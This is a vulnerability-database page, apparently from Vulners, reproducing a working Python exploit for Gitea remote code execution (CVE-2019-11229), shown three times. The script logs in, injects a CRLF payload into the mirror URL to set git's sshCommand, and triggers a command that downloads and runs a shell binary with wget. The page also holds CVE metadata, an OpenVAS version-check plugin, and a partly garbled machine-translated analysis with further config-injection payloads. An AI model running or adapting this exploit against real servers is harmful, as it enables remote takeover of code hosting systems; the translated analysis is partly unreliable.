Search...

Gitea 1.7.5 Remote Code Execution

2021-01-07T00:00:00

ID PACKETSTORM:160833
Type packetstorm
Reporter 1F98D
Modified 2021-01-07T00:00:00

Description

                                        
                                            `# Exploit Title: Gitea 1.7.5 - Remote Code Execution  
# Date: 2020-05-11  
# Exploit Author: 1F98D  
# Original Author: LoRexxar  
# Software Link: https://gitea.io/en-us/  
# Version: Gitea before 1.7.6 and 1.8.x before 1.8-RC3  
# Tested on: Debian 9.11 (x64)  
# CVE: CVE-2019-11229  
# References:  
# https://medium.com/@knownsec404team/analysis-of-cve-2019-11229-from-git-config-to-rce-32c217727baa  
#  
# Gitea before 1.7.6 and 1.8.x before 1.8-RC3 mishandles mirror repo URL settings,  
# leading to authenticated remote code execution.  
#   
#!/usr/bin/python3  
  
import re  
import os  
import sys  
import random  
import string  
import requests  
import tempfile  
import threading  
import http.server  
import socketserver  
import urllib.parse  
from functools import partial  
  
USERNAME = "test"  
PASSWORD = "password123"  
HOST_ADDR = '192.168.1.1'  
HOST_PORT = 3000  
URL = 'http://192.168.1.2:3000'   
CMD = 'wget http://192.168.1.2:8080/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell'   
  
# Login   
s = requests.Session()   
print('Logging in')   
body = {   
'user_name': USERNAME,   
'password': PASSWORD   
}   
r = s.post(URL + '/user/login',data=body)   
if r.status_code != 200:   
print('Login unsuccessful')   
  
sys.exit(1)   
print('Logged in successfully')   
  
# Obtain user ID for future requests  
print('Retrieving user ID')  
r = s.get(URL + '/')  
if r.status_code != 200:  
print('Could not retrieve user ID')  
sys.exit(1)  
  
m = re.compile("&lt;meta name=\"_uid\" content=\"(.+)\" /&gt;").search(r.text)  
USER_ID = m.group(1)  
print('Retrieved user ID: {}'.format(USER_ID))  
  
# Hosting the repository to clone  
gitTemp = tempfile.mkdtemp()  
os.system('cd {} && git init'.format(gitTemp))  
os.system('cd {} && git config user.email x@x.com && git config user.name x && touch x && git add x && git commit -m x'.format(gitTemp))  
os.system('git clone --bare {} {}.git'.format(gitTemp, gitTemp))  
os.system('cd {}.git && git update-server-info'.format(gitTemp))  
handler = partial(http.server.SimpleHTTPRequestHandler,directory='/tmp')  
socketserver.TCPServer.allow_reuse_address = True  
httpd = socketserver.TCPServer(("", HOST_PORT), handler)  
t = threading.Thread(target=httpd.serve_forever)  
t.start()  
print('Created temporary git server to host {}.git'.format(gitTemp))  
  
# Create the repository  
print('Creating repository')  
REPO_NAME = ''.join(random.choice(string.ascii_lowercase) for i in range(8))  
body = {  
'_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),  
'uid': USER_ID,  
'repo_name': REPO_NAME,  
'clone_addr': 'http://{}:{}/{}.git'.format(HOST_ADDR, HOST_PORT, gitTemp[5:]),  
'mirror': 'on'  
}  
r = s.post(URL + '/repo/migrate', data=body)  
if r.status_code != 200:  
print('Error creating repo')  
httpd.shutdown()  
t.join()  
sys.exit(1)  
print('Repo "{}" created'.format(REPO_NAME))  
  
# Inject command into config file  
print('Injecting command into repo')  
body = {  
'_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),  
'mirror_address': 'ssh://example.com/x/x"""\r\n[core]\r\nsshCommand="{}"\r\na="""'.format(CMD),  
'action': 'mirror',  
'enable_prune': 'on',  
'interval': '8h0m0s'  
}  
r = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body)  
if r.status_code != 200:  
print('Error injecting command')  
httpd.shutdown()  
t.join()  
sys.exit(1)  
print('Command injected')  
  
# Trigger the command  
print('Triggering command')  
body = {  
'_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),  
'action': 'mirror-sync'  
}  
r = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body)  
if r.status_code != 200:  
print('Error triggering command')  
httpd.shutdown()  
t.join()  
sys.exit(1)  
  
print('Command triggered')  
  
# Shutdown the git server  
httpd.shutdown()  
  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:160833", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Gitea 1.7.5 Remote Code Execution", "description": "", "published": "2021-01-07T00:00:00", "modified": "2021-01-07T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://packetstormsecurity.com/files/160833/Gitea-1.7.5-Remote-Code-Execution.html", "reporter": "1F98D", "references": [], "cvelist": ["CVE-2019-11229"], "lastseen": "2021-01-07T17:03:34", "viewCount": 42, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-11229"]}, {"type": "exploitdb", "idList": ["EDB-ID:49383"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142305"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995191"]}], "modified": "2021-01-07T17:03:34", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-01-07T17:03:34", "rev": 2}, "vulnersScore": 7.2}, "sourceHref": "https://packetstormsecurity.com/files/download/160833/gitea175-exec.txt", "sourceData": "`# Exploit Title: Gitea 1.7.5 - Remote Code Execution \n# Date: 2020-05-11 \n# Exploit Author: 1F98D \n# Original Author: LoRexxar \n# Software Link: https://gitea.io/en-us/ \n# Version: Gitea before 1.7.6 and 1.8.x before 1.8-RC3 \n# Tested on: Debian 9.11 (x64) \n# CVE: CVE-2019-11229 \n# References: \n# https://medium.com/@knownsec404team/analysis-of-cve-2019-11229-from-git-config-to-rce-32c217727baa \n# \n# Gitea before 1.7.6 and 1.8.x before 1.8-RC3 mishandles mirror repo URL settings, \n# leading to authenticated remote code execution. \n# \n#!/usr/bin/python3 \n \nimport re \nimport os \nimport sys \nimport random \nimport string \nimport requests \nimport tempfile \nimport threading \nimport http.server \nimport socketserver \nimport urllib.parse \nfrom functools import partial \n \nUSERNAME = \"test\" \nPASSWORD = \"password123\" \nHOST_ADDR = '192.168.1.1' \nHOST_PORT = 3000 \nURL = 'http://192.168.1.2:3000' \nCMD = 'wget http://192.168.1.2:8080/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell' \n \n# Login \ns = requests.Session() \nprint('Logging in') \nbody = { \n'user_name': USERNAME, \n'password': PASSWORD \n} \nr = s.post(URL + '/user/login',data=body) \nif r.status_code != 200: \nprint('Login unsuccessful') \n \nsys.exit(1) \nprint('Logged in successfully') \n \n# Obtain user ID for future requests \nprint('Retrieving user ID') \nr = s.get(URL + '/') \nif r.status_code != 200: \nprint('Could not retrieve user ID') \nsys.exit(1) \n \nm = re.compile(\"<meta name=\\\"_uid\\\" content=\\\"(.+)\\\" />\").search(r.text) \nUSER_ID = m.group(1) \nprint('Retrieved user ID: {}'.format(USER_ID)) \n \n# Hosting the repository to clone \ngitTemp = tempfile.mkdtemp() \nos.system('cd {} && git init'.format(gitTemp)) \nos.system('cd {} && git config user.email x@x.com && git config user.name x && touch x && git add x && git commit -m x'.format(gitTemp)) \nos.system('git clone --bare {} {}.git'.format(gitTemp, gitTemp)) \nos.system('cd {}.git && git update-server-info'.format(gitTemp)) \nhandler = partial(http.server.SimpleHTTPRequestHandler,directory='/tmp') \nsocketserver.TCPServer.allow_reuse_address = True \nhttpd = socketserver.TCPServer((\"\", HOST_PORT), handler) \nt = threading.Thread(target=httpd.serve_forever) \nt.start() \nprint('Created temporary git server to host {}.git'.format(gitTemp)) \n \n# Create the repository \nprint('Creating repository') \nREPO_NAME = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) \nbody = { \n'_csrf': urllib.parse.unquote(s.cookies.get('_csrf')), \n'uid': USER_ID, \n'repo_name': REPO_NAME, \n'clone_addr': 'http://{}:{}/{}.git'.format(HOST_ADDR, HOST_PORT, gitTemp[5:]), \n'mirror': 'on' \n} \nr = s.post(URL + '/repo/migrate', data=body) \nif r.status_code != 200: \nprint('Error creating repo') \nhttpd.shutdown() \nt.join() \nsys.exit(1) \nprint('Repo \"{}\" created'.format(REPO_NAME)) \n \n# Inject command into config file \nprint('Injecting command into repo') \nbody = { \n'_csrf': urllib.parse.unquote(s.cookies.get('_csrf')), \n'mirror_address': 'ssh://example.com/x/x\"\"\"\\r\\n[core]\\r\\nsshCommand=\"{}\"\\r\\na=\"\"\"'.format(CMD), \n'action': 'mirror', \n'enable_prune': 'on', \n'interval': '8h0m0s' \n} \nr = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body) \nif r.status_code != 200: \nprint('Error injecting command') \nhttpd.shutdown() \nt.join() \nsys.exit(1) \nprint('Command injected') \n \n# Trigger the command \nprint('Triggering command') \nbody = { \n'_csrf': urllib.parse.unquote(s.cookies.get('_csrf')), \n'action': 'mirror-sync' \n} \nr = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body) \nif r.status_code != 200: \nprint('Error triggering command') \nhttpd.shutdown() \nt.join() \nsys.exit(1) \n \nprint('Command triggered') \n \n# Shutdown the git server \nhttpd.shutdown() \n \n \n`\n"}

{"cve": [{"lastseen": "2021-01-08T14:20:40", "description": "models/repo_mirror.go in Gitea before 1.7.6 and 1.8.x before 1.8-RC3 mishandles mirror repo URL settings, leading to remote code execution.", "edition": 9, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-15T12:31:00", "title": "CVE-2019-11229", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11229"], "modified": "2021-01-07T19:15:00", "cpe": ["cpe:/a:gitea:gitea:1.8.0"], "id": "CVE-2019-11229", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-11229", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:gitea:gitea:1.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:gitea:gitea:1.8.0:rc1:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2021-01-06T16:29:45", "description": "", "published": "2021-01-06T00:00:00", "type": "exploitdb", "title": "Gitea 1.7.5 - Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-11229"], "modified": "2021-01-06T00:00:00", "id": "EDB-ID:49383", "href": "https://www.exploit-db.com/exploits/49383", "sourceData": "# Exploit Title: Gitea 1.7.5 - Remote Code Execution\r\n# Date: 2020-05-11\r\n# Exploit Author: 1F98D\r\n# Original Author: LoRexxar\r\n# Software Link: https://gitea.io/en-us/\r\n# Version: Gitea before 1.7.6 and 1.8.x before 1.8-RC3\r\n# Tested on: Debian 9.11 (x64)\r\n# CVE: CVE-2019-11229\r\n# References:\r\n# https://medium.com/@knownsec404team/analysis-of-cve-2019-11229-from-git-config-to-rce-32c217727baa\r\n#\r\n# Gitea before 1.7.6 and 1.8.x before 1.8-RC3 mishandles mirror repo URL settings,\r\n# leading to authenticated remote code execution.\r\n# \r\n#!/usr/bin/python3\r\n\r\nimport re\r\nimport os\r\nimport sys\r\nimport random\r\nimport string\r\nimport requests\r\nimport tempfile\r\nimport threading\r\nimport http.server\r\nimport socketserver\r\nimport urllib.parse\r\nfrom functools import partial\r\n\r\nUSERNAME = \"test\"\r\nPASSWORD = \"password123\"\r\nHOST_ADDR = '192.168.1.1'\r\nHOST_PORT = 3000\r\nURL = 'http://192.168.1.2:3000' \r\nCMD = 'wget http://192.168.1.2:8080/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell' \r\n \r\n# Login \r\ns = requests.Session() \r\nprint('Logging in') \r\nbody = { \r\n 'user_name': USERNAME, \r\n 'password': PASSWORD \r\n} \r\nr = s.post(URL + '/user/login',data=body) \r\nif r.status_code != 200: \r\n print('Login unsuccessful') \r\n \r\n sys.exit(1) \r\nprint('Logged in successfully') \r\n\r\n# Obtain user ID for future requests\r\nprint('Retrieving user ID')\r\nr = s.get(URL + '/')\r\nif r.status_code != 200:\r\n print('Could not retrieve user ID')\r\n sys.exit(1)\r\n\r\nm = re.compile(\"<meta name=\\\"_uid\\\" content=\\\"(.+)\\\" />\").search(r.text)\r\nUSER_ID = m.group(1)\r\nprint('Retrieved user ID: {}'.format(USER_ID))\r\n\r\n# Hosting the repository to clone\r\ngitTemp = tempfile.mkdtemp()\r\nos.system('cd {} && git init'.format(gitTemp))\r\nos.system('cd {} && git config user.email x@x.com && git config user.name x && touch x && git add x && git commit -m x'.format(gitTemp))\r\nos.system('git clone --bare {} {}.git'.format(gitTemp, gitTemp))\r\nos.system('cd {}.git && git update-server-info'.format(gitTemp))\r\nhandler = partial(http.server.SimpleHTTPRequestHandler,directory='/tmp')\r\nsocketserver.TCPServer.allow_reuse_address = True\r\nhttpd = socketserver.TCPServer((\"\", HOST_PORT), handler)\r\nt = threading.Thread(target=httpd.serve_forever)\r\nt.start()\r\nprint('Created temporary git server to host {}.git'.format(gitTemp))\r\n\r\n# Create the repository\r\nprint('Creating repository')\r\nREPO_NAME = ''.join(random.choice(string.ascii_lowercase) for i in range(8))\r\nbody = {\r\n '_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),\r\n 'uid': USER_ID,\r\n 'repo_name': REPO_NAME,\r\n 'clone_addr': 'http://{}:{}/{}.git'.format(HOST_ADDR, HOST_PORT, gitTemp[5:]),\r\n 'mirror': 'on'\r\n}\r\nr = s.post(URL + '/repo/migrate', data=body)\r\nif r.status_code != 200:\r\n print('Error creating repo')\r\n httpd.shutdown()\r\n t.join()\r\n sys.exit(1)\r\nprint('Repo \"{}\" created'.format(REPO_NAME))\r\n\r\n# Inject command into config file\r\nprint('Injecting command into repo')\r\nbody = {\r\n '_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),\r\n 'mirror_address': 'ssh://example.com/x/x\"\"\"\\r\\n[core]\\r\\nsshCommand=\"{}\"\\r\\na=\"\"\"'.format(CMD),\r\n 'action': 'mirror',\r\n 'enable_prune': 'on',\r\n 'interval': '8h0m0s'\r\n}\r\nr = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body)\r\nif r.status_code != 200:\r\n print('Error injecting command')\r\n httpd.shutdown()\r\n t.join()\r\n sys.exit(1)\r\nprint('Command injected')\r\n\r\n# Trigger the command\r\nprint('Triggering command')\r\nbody = {\r\n '_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),\r\n 'action': 'mirror-sync'\r\n}\r\nr = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body)\r\nif r.status_code != 200:\r\n print('Error triggering command')\r\n httpd.shutdown()\r\n t.join()\r\n sys.exit(1)\r\n\r\nprint('Command triggered')\r\n\r\n# Shutdown the git server\r\nhttpd.shutdown()", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/49383"}], "openvas": [{"lastseen": "2019-05-29T18:32:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-11229", "CVE-2019-11228"], "description": "Gitea is prone to multiple vulnerabilities.", "modified": "2019-04-25T00:00:00", "published": "2019-04-25T00:00:00", "id": "OPENVAS:1361412562310142305", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142305", "type": "openvas", "title": "Gitea < 1.7.6 or < 1.8.0-rc3 Remote Code Execution Vulnerability", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:gitea:gitea\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142305\");\n script_version(\"2019-04-25T08:58:41+0000\");\n script_tag(name:\"last_modification\", value:\"2019-04-25 08:58:41 +0000 (Thu, 25 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-25 08:34:13 +0000 (Thu, 25 Apr 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2019-11228\", \"CVE-2019-11229\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Gitea < 1.7.6 or < 1.8.0-rc3 Remote Code Execution Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_gitea_detect.nasl\");\n script_mandatory_keys(\"gitea/detected\");\n\n script_tag(name:\"summary\", value:\"Gitea is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Gitea is prone to multiple vulnerabilities:\n\n - repo/setting.go does not validate the form.MirrorAddress before calling SaveAddress (CVE-2019-11228)\n\n - models/repo_mirror.go mishandles mirror repo URL settings, leading to remote code execution (CVE-2019-11229)\");\n\n script_tag(name:\"affected\", value:\"Gitea versions prior to 1.7.6 and 1.8.x before 1.8-rc3.\");\n\n script_tag(name:\"solution\", value:\"Update to version 1.7.6, 1.8-rc3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://github.com/go-gitea/gitea/releases/tag/v1.7.6\");\n script_xref(name:\"URL\", value:\"https://github.com/go-gitea/gitea/releases/tag/v1.8.0-rc3\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_is_less(version: version, test_version: \"1.7.6\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"1.7.6\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"1.8.0.rc1\", test_version2: \"1.8.0.rc2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"1.8.0.rc3\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "myhack58": [{"lastseen": "2019-07-24T18:35:58", "bulletinFamily": "info", "cvelist": [], "description": "2019 4 January 15, gitea had burst through a hole, coinciding with the time of this vulnerability more curious proceed to study a bit, and the vulnerability of the description is this: \nmodels/repo_mirror. go in Gitea before 1.7.6 and 1.8. x before 1.8-RC3 mishandles mirror repo URL settings, leading to remote code execution. \nIn and friends@hammer together with research, the successful control of the git config of the content, but from the git config to RCE the process of the difficulties encountered, it is temporarily set aside, in a few months after, happen to get@Lz1y and@x1nGuang two-bit gangster inspired, successful reproduction by this vulnerability, here we have to carefully study this issue. \nAnalysis patch \nFirst, according to the cve information, to determine the vulnerability 1. 7. 6 and 1. 8. 0-rc3 on repair \nhttps://github.com/go-gitea/gitea/releases/tag/v1.7.6 \nhttps://github.com/go-gitea/gitea/releases/tag/v1.8.0-rc3 \nAccording to vulnerability file for repo_mirror. go this information on locking the update of the commit, the commit is mainly for #6593 and#6595 \nhttps://github.com/go-gitea/gitea/pull/6595/commits/52af826a7aa1df6ab538d881db236698cb367cd7 \nAccording to the patch may be substantially locking the key point \n/models/repo_mirror. go \n! [](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABcayaaaaffcsjaaaaaxnsr0iars4c6qaaaarnqu1baacxjwv8yquaaaajcehzcwaadsqaaa7eazurdhsaaaansurbvbhxyzh8+PB/AAffA0nNPuCLAAAAAElFTkSuQmCC) \nWhen the warehouse is mirror warehouse, the settings page will be displayed on the mirror configuration \nif ! repo. IsMirror { \nctx. NotFound(\"\", nil) \nreturn \n} \nthe patch in the original to modify the configuration file in the url option modified to NewCommand's. Very easy to understand, will be written to the file changes to execute a command, this fix must be because of the written file exists unable to fix this dilemma, then this also shows the url where you can by passing in%0d%0a to The Wrap, the lead to modify the config in the other configuration. \n\nControl gitconfig \nFollowing the previous logic, we first create a new mirror repository. \n! [](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABcayaaaaffcsjaaaaaxnsr0iars4c6qaaaarnqu1baacxjwv8yquaaaajcehzcwaadsqaaa7eazurdhsaaaansurbvbhxyzh8+PB/AAffA0nNPuCLAAAAAElFTkSuQmCC) \nCapture and modify the mirror_address for the corresponding attribute. \n! [](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABcayaaaaffcsjaaaaaxnsr0iars4c6qaaaarnqu1baacxjwv8yquaaaajcehzcwaadsqaaa7eazurdhsaaaansurbvbhxyzh8+PB/AAffA0nNPuCLAAAAAElFTkSuQmCC) \nmirror_address=https%3A%2F%2Ftest%3A%40github. com%2FLoRexxar%2Ftest_for_gitea. git\"\"\"%0d%0a[core]%0d%0atest=/tmp%0d%0aa=\"\"\" \n! [](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABcayaaaaffcsjaaaaaxnsr0iars4c6qaaaarnqu1baacxjwv8yquaaaajcehzcwaadsqaaa7eazurdhsaaaansurbvbhxyzh8+PB/AAffA0nNPuCLAAAAAElFTkSuQmCC) \nCan pass in a variety of configurations, you can control the config file content. \nMore interesting is that if you update the synchronization settings, the server will format the configuration. \n! [](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABcayaaaaffcsjaaaaaxnsr0iars4c6qaaaarnqu1baacxjwv8yquaaaajcehzcwaadsqaaa7eazurdhsaaaansurbvbhxyzh8+PB/AAffA0nNPuCLAAAAAElFTkSuQmCC) \n\nFurther use \nAnd how important is from the config file can be controlled to the next use. \nFirst, the git server end only will be retained. git the content, not the complete similar to our client to use the git repository. So it is difficult to introduce an external file. Otherwise you can set the hook directory to achieve RCE, this idea of the key point is to find a control file write or file upload. \nSecondly, another idea is to find a capable of executing command of the configuration, and looking for a can trigger the configuration of the remote configuration. \nhttps://git-scm.com/docs/git-config \n\nBy writing a file with githook path RCE \nIn git, there is one called Git Hook something that is used in processing some operation, the corresponding hook will execute the corresponding script. \n! [](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABcayaaaaffcsjaaaaaxnsr0iars4c6qaaaarnqu1baacxjwv8yquaaaajcehzcwaadsqaaa7eazurdhsaaaansurbvbhxyzh8+PB/AAffA0nNPuCLAAAAAElFTkSuQmCC) \nIn the web interface, only gitea the administrator to manage the git hook, so for ordinary users, we cannot directly by editing the git hook to modify the script. \nBut we can control the git config to modify the hooks stored in the directory. \n! [](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABcayaaaaffcsjaaaaaxnsr0iars4c6qaaaarnqu1baacxjwv8yquaaaajcehzcwaadsqaaa7eazurdhsaaaansurbvbhxyzh8+PB/AAffA0nNPuCLAAAAAElFTkSuQmCC) \nWhen we configured to send the \nmirror_address=https%3A%2F%2Fgithub. com%2FLoRexxar%2Ftest_for_gitea. git\"\"\"%0d%0a[core]%0d%0ahooksPath=/tmp%0d%0aa=\"\"\" \nService side config file becomes \n! [](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABcayaaaaffcsjaaaaaxnsr0iars4c6qaaaarnqu1baacxjwv8yquaaaajcehzcwaadsqaaa7eazurdhsaaaansurbvbhxyzh8+PB/AAffA0nNPuCLAAAAAElFTkSuQmCC)\n\n**[1] [[2]](<95191_2.htm>) [next](<95191_2.htm>)**\n", "edition": 1, "modified": "2019-07-24T00:00:00", "published": "2019-07-24T00:00:00", "id": "MYHACK58:62201995191", "href": "http://www.myhack58.com/Article/html/3/62/2019/95191.htm", "title": "CVE-2019-11229 detailed analysis --git config controllable-RCE-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}]}